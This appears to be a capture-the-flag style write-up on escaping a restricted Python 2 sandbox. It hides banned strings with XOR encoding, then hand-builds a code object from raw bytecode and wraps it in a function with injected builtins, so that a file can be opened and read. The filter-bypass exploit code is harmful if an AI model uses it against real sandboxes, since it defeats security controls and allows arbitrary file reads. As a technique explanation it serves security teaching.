"Fun" modules could not be imported (sys, os, etc)

"Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)

"Fun" attributes, nope! (myfunc.func_code)

Fun stuff couldn't even be in static strings! (Annoying, but not really that important).

str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30] for i in range(0,len(str1)): str1[i] = chr(str1[i] ^ 0x41) str1 = ''.join(str1)

cdbj = type(myfunc.__code__)

>>> dir(f.__code__) ['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__','__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__' , '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']

co_code: string of raw compiled bytecode

co_consts: tuple of constants used in the bytecode

co_names: tuple of names of local variables

import dis def read(): return open("./poc.py",'r').read() dis.dis(read.__code__) >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 28 0 LOAD_GLOBAL 0 (open) 3 LOAD_CONST 1 ('./poc.py') 6 LOAD_CONST 2 ('r') 9 CALL_FUNCTION 2 12 LOAD_ATTR 1 (read) 15 CALL_FUNCTION 0 18 RETURN_VALUE

bytecode = read.__code__.co_code print bytecode.encode('hex') >>> 7400006401006402008302006a010083000053

code = type(myfunc.__code__) #Get a Code Object bytecode = "7400006401006402008302006a010083000053".decode('hex') #Get our bytecode filename = "./poc.py" #Set our filename consts = (None,filename,'r') #Set up our constants names = ('open','read') #Set up our names #Slide our values into the code object. codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())

def f(): pass function = type(f)



A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined.

import __builtin__ mydict = {} mydict["__builtins__"] = __builtin__

return function(codeobj, mydict, None, None, None)